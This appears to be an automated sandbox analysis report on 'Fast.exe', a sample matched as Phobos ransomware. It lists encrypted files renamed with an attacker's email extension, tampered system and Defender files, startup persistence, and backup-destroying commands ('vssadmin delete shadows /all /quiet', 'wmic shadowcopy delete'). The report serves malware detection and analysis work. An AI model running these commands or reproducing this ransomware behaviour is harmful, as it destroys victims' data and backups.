Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\c124efa99176e538252a2ae3cef2137e.png.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\c6534465ea418b6c252e2b74bc9e4bbb.png.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\db3460ac8568d0137d4556570169e475.png.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\dc3b5d449449a5103f90189b239c0bf6.png.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-ccx-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-ccxfeedback-popups-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-editsettings-popups-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-enhance-popups-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-extract-popups-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-filepicker-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-help-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-modals-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-popups-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-readerRhp-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-RMUpsellCard-modals-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-rsfeedback-modals-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-rsmanagerecipients-modals-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-rspresendreview-modals-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-SignCrossSellCard-modals-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-signsettings-popups-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-split-popups-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-unifiedShare-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-verbs-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-videoplayer-chunk.js.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: Fast.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: vk_swiftshader.dll.pdb source: vk_swiftshader.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight.0.dr

Spreading

Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Common Files\microsoft shared\ink\mraut.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\Classification\SenseCE.exe
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Common Files\microsoft shared\ink\micaut.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\SenseNdr.exe
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Windows Photo Viewer\PhotoViewer.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\System.ServiceModel.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Common Files\microsoft shared\ink\InkObj.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Windows NT\Accessories\wordpad.exe
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\System.Data.Entity.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Windows Defender\MpSvc.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\PresentationFramework.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Windows Defender\NisSrv.exe
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\PresentationCore.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\Classification\OPCTextExtractorWin.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\Classification\nl7data0804.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Common Files\microsoft shared\ink\tabskb.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Windows Media Player\setup_wm.exe
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Windows Photo Viewer\ImagingEngine.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Windows Photo Viewer\PhotoAcq.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\Classification\nl7data0404.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Common Files\microsoft shared\ClickToRun\msix.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\Classification\nl7data0011.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files (x86)\common files\Microsoft Shared\ink\mraut.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Common Files\microsoft shared\ClickToRun\RepoMan.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\SenseCM.exe
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVIntegration.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\Classification\mce.dll
Source: C:\Users\user\Desktop\Fast.exe | Renamed to system file: C:\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\Desktop\Fast.exe | Code function: 2_2_00CA5D61 FindFirstFileW,FindNextFileW,FindClose, 2_2_00CA5D61
Source: C:\Users\user\AppData\Local\Fast.exe | Code function: 14_2_000D5D61 FindFirstFileW,FindNextFileW,FindClose, 14_2_000D5D61
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exe | Code function: 25_2_00205D61 FindFirstFileW,FindNextFileW,FindClose, 25_2_00205D61
Source: C:\Users\user\Desktop\Fast.exe | Code function: 2_2_00CA5067 htonl,htons,htonl,socket,ioctlsocket,connect,WSAGetLastError,getsockopt,recv,WSAGetLastError,getpeername,closesocket, 2_2_00CA5067
Source: icudtl.dat.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight.0.dr | String found in binary or memory: http://www.unicode.org/copyright.html

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Program Files\7-Zip\readme.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight | Dropped file: (encrypted, high-entropy content not reproduced here)
Source: Yara match | File source: Process Memory Space: Fast.exe PID: 7608, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Fast.exe PID: 7652, type: MEMORYSTR
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
Source: vssadmin.exe, 00000007.00000002.1959736829.000002B8A3A80000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\Users\user\Desktop\C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quietvssadmin delete shadows /all /quietWinsta0\DefaultaR
Source: vssadmin.exe, 00000007.00000002.1959736829.000002B8A3A80000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vssadmin delete shadows /all /quiet
Source: vssadmin.exe, 00000007.00000002.1959736829.000002B8A3A80000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vssadmin delete shadows /all /quiet%R
Source: vssadmin.exe, 00000007.00000002.1959668916.000002B8A3A35000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vssadmindeleteshadows/all/quietQ
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\A3DUtils.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99901267157
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99898931022
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ACE.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99986972484
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Program Files\7-Zip\7-zip.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99830913293
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Program Files\7-Zip\7-zip32.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99705499473
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Program Files\7-Zip\7z.sfx.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.9991793992
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Program Files\7-Zip\7z.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.9997389267
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Program Files\7-Zip\7zCon.sfx.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99913777028
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Program Files\7-Zip\7zFM.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99982659886
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Program Files\7-Zip\7zG.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99973075229
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Program Files\7-Zip\History.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99644276545
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat.tlb.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99710500999
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99506954518
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99563636928
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99950088852
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Program Files\7-Zip\7-zip.chm.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99813295041
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\chrome_100_percent.pak.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99965914316
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\chrome_200_percent.pak.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99982659646
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\chrome_elf.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99984682447
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\COPYING.LGPLv2.1.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99243281361
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\locales\en-US.pak.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99943396361
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\snapshot_blob.bin.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99960995555
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\v8_context_snapshot.bin.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99970310397
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\vulkan-1.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99977395248
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\chrome_100_percent.pak.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99967604674
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\chrome_200_percent.pak.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99979500059
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\COPYING.LGPLv2.1.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99434105272
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\chrome_elf.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99986290978
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\locales\en-US.pak.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99951739883
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Program Files\7-Zip\Lang\gu.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99009959487
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\snapshot_blob.bin.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.9995772406
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\v8_context_snapshot.bin.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99972040841
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Program Files\7-Zip\Lang\mng.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99152908406
Source: C:\Users\user\Desktop\Fast.exe | File created: C:\Program Files\7-Zip\Lang\mng2.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight entropy: 7.99146248725

System Summary

Source: Fast.exe, type: SAMPLE, Matched rule: Identifies Phobos ransomware, Author: unknown
Source: Fast.exe, type: SAMPLE, Matched rule: Detects Phobos ransomware, Author: ditekshen
Source: 14.0.Fast.exe.d0000.0.unpack, type: UNPACKEDPE, Matched rule: Identifies Phobos ransomware, Author: unknown
Source: 14.0.Fast.exe.d0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Phobos ransomware, Author: ditekshen
Source: 14.2.Fast.exe.d0000.0.unpack, type: UNPACKEDPE, Matched rule: Identifies Phobos ransomware, Author: unknown
Source: 14.2.Fast.exe.d0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Phobos ransomware, Author: ditekshen
Source: 19.2.Fast.exe.d0000.0.unpack, type: UNPACKEDPE, Matched rule: Identifies Phobos ransomware, Author: unknown
Source: 19.2.Fast.exe.d0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Phobos ransomware, Author: ditekshen
Source: 25.2.Fast.exe.200000.0.unpack, type: UNPACKEDPE, Matched rule: Identifies Phobos ransomware, Author: unknown
Source: 25.2.Fast.exe.200000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Phobos ransomware, Author: ditekshen
Source: 19.0.Fast.exe.d0000.0.unpack, type: UNPACKEDPE, Matched rule: Identifies Phobos ransomware, Author: unknown
Source: 19.0.Fast.exe.d0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Phobos ransomware, Author: ditekshen
Source: 17.2.Fast.exe.d0000.0.unpack, type: UNPACKEDPE, Matched rule: Identifies Phobos ransomware, Author: unknown
Source: 17.2.Fast.exe.d0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Phobos ransomware, Author: ditekshen
Source: 2.0.Fast.exe.ca0000.0.unpack, type: UNPACKEDPE, Matched rule: Identifies Phobos ransomware, Author: unknown
Source: 2.0.Fast.exe.ca0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Phobos ransomware, Author: ditekshen
Source: 17.0.Fast.exe.d0000.0.unpack, type: UNPACKEDPE, Matched rule: Identifies Phobos ransomware, Author: unknown
Source: 17.0.Fast.exe.d0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Phobos ransomware, Author: ditekshen
Source: 25.0.Fast.exe.200000.0.unpack, type: UNPACKEDPE, Matched rule: Identifies Phobos ransomware, Author: unknown
Source: 25.0.Fast.exe.200000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Phobos ransomware, Author: ditekshen
Source: 2.2.Fast.exe.ca0000.0.unpack, type: UNPACKEDPE, Matched rule: Identifies Phobos ransomware, Author: unknown
Source: 2.2.Fast.exe.ca0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Phobos ransomware, Author: ditekshen
Source: 0.0.Fast.exe.ca0000.0.unpack, type: UNPACKEDPE, Matched rule: Identifies Phobos ransomware, Author: unknown
Source: 0.0.Fast.exe.ca0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Phobos ransomware, Author: ditekshen
Source: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Identifies Phobos ransomware, Author: unknown
Source: 00000013.00000002.2135391960.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY, Matched rule: Identifies Phobos ransomware, Author: unknown
Source: 00000013.00000000.2125457686.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY, Matched rule: Identifies Phobos ransomware, Author: unknown
Source: 00000000.00000000.1776137882.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Identifies Phobos ransomware, Author: unknown
Source: 0000000E.00000000.1940315719.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY, Matched rule: Identifies Phobos ransomware, Author: unknown
Source: 00000011.00000000.2019602481.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY, Matched rule: Identifies Phobos ransomware, Author: unknown
Source: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY, Matched rule: Identifies Phobos ransomware, Author: unknown
Source: 00000002.00000003.1779252416.0000000000DAD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Identifies Phobos ransomware, Author: unknown
Source: 00000019.00000000.2225352024.0000000000201000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY, Matched rule: Identifies Phobos ransomware, Author: unknown
Source: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY, Matched rule: Identifies Phobos ransomware, Author: unknown
Source: 00000011.00000002.2024695997.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY, Matched rule: Identifies Phobos ransomware, Author: unknown
Source: 00000002.00000000.1778560416.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Identifies Phobos ransomware, Author: unknown
Source: C:\Users\user\Desktop\Fast.exe, Process Stats: CPU usage > 49%
Source: C:\Windows\System32\wbadmin.exe, File created: C:\Windows\Logs\WindowsBackup
Source: C:\Users\user\Desktop\Fast.exe, Code function: 2_2_00CA82EE
Source: C:\Users\user\Desktop\Fast.exe, Code function: 2_2_00CA848A
Source: C:\Users\user\Desktop\Fast.exe, Code function: 2_2_00CA669B
Source: C:\Users\user\Desktop\Fast.exe, Code function: 2_2_00CA646A
Source: C:\Users\user\Desktop\Fast.exe, Code function: 2_2_00CA6A04
Source: C:\Users\user\Desktop\Fast.exe, Code function: 2_2_00CA6F2A
Source: C:\Users\user\AppData\Local\Fast.exe, Code function: 14_2_000D6A04
Source: C:\Users\user\AppData\Local\Fast.exe, Code function: 14_2_000D6F2A
Source: C:\Users\user\AppData\Local\Fast.exe, Code function: 14_2_000D646A
Source: C:\Users\user\AppData\Local\Fast.exe, Code function: 14_2_000D848A
Source: C:\Users\user\AppData\Local\Fast.exe, Code function: 14_2_000D669B
Source: C:\Users\user\AppData\Local\Fast.exe, Code function: 14_2_000D82EE
